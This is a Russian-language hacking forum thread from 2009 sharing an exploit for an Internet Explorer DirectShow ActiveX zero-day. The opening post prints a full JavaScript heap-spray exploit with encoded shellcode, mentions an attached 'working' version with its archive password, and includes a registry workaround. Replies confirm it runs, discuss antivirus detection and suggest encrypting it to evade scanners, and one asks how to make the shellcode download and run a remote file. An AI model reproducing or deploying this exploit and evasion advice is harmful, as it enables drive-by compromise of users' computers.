ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
0-day bugs в MS DirectShow (Рабочий сплоит) |
07.07.2009, 11:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
0-day bugs в MS DirectShow (Рабочий сплоит)
Как уже было написано раньше, существует уязвимость в DirectShow. Предыдущие новости все описывали что баг существует, но сплоита в паблике небыло.
И Вот сегодня появился сплоит в паблике (НО ВЕЗДЕ ОН БЫЛ НЕ РАБОЧИЙ)
Обнаружена активная эксплуатация еще одной уязвимости нулевого дня в Microsoft DirectShow. Согласно данным CSIS, в настоящий момент злоумышленники используют несколько тысяч новых скомпрометированных сайтов для распространения вредоносного кода, эксплуатируемого уязвимость в Microsoft DirectShow.
Также в открытом доступе находится эксплоит:
http://www.securitylab.ru/poc/382196.php
В качестве временного решения мы рекомендуем отключить уязвимую библиотеку:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftInternet explorer\ActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
(C) www.securitylab.ru
По адресу http://www.securitylab.ru/poc/382196.php
выложен сплоит:
Код:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Но он является не полным, по этому многие проверив, сразу увидели что толку от этого мало.
Поискав в инете на забугорном сайте и чуть подправив код, получаем рабочий сплоит!!
Протестировал на IE 7 - влегкую пробил осла, запустил калькулятор и закрыл осла.
В аттаче находится рабочий сплоит и картинка - которая как раз и является его основной частью.
Последний раз редактировалось slesh; 07.07.2009 в 11:28..
|
|
|
07.07.2009, 11:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
P.S. Пароль на архив: a4at
|
|
|
|
07.07.2009, 11:43
|
|
Познающий
Регистрация: 08.11.2007
Сообщений: 66
Провел на форуме:
507550
Репутация:
66
|
|
Спасибо!
Может пригодиться  |
|
|
|
07.07.2009, 12:00
|
|
Познавший АНТИЧАТ
Регистрация: 25.10.2006
Сообщений: 1,375
Провел на форуме:
7006470
Репутация:
1769
|
|
Хмм.. Действительно работает, IE упал, запустился калькулятор...
slesh +5
|
|
|
|
07.07.2009, 12:16
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427
Репутация:
766
|
|
каспером уже палицо кстати.
|
|
|
|
07.07.2009, 12:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241
Репутация:
3349
|
|
2 nonamez так можно криптануть и будет норм наверное )
|
|
|
|
08.07.2009, 12:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Кстате даже комодо палит)
__________________
BlackHat. MoDL
|
|
|
|
08.07.2009, 14:04
|
|
Познающий
Регистрация: 08.11.2007
Сообщений: 66
Провел на форуме:
507550
Репутация:
66
|
|
NOD32 молчит...
|
|
|
|
08.07.2009, 14:39
|
|
Новичок
Регистрация: 02.07.2008
Сообщений: 12
Провел на форуме:
40433
Репутация:
5
|
|
Как сгенерировать dashell (ShellCode) под свои нужды. К примеру запустить файл http://google.com/file.exe
Спасибо.
|
|
|
|
08.07.2009, 15:03
|
|
Постоянный
Регистрация: 10.12.2005
Сообщений: 939
Провел на форуме:
3886281
Репутация:
929
|
|
Воспользоваться генератором шелов. Если не ошибаюсь автор Proteus (ну покрайней мере автор ГУЕВ под него). Ищи на Метасплойте
http://www.metasploit.com/shellcode/
Последний раз редактировалось spider-intruder; 08.07.2009 в 15:05..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для m0le[x]](/avatars/avatar28661.jpg?1372494){kind=avatar}
Похожие темы
Линейный вид
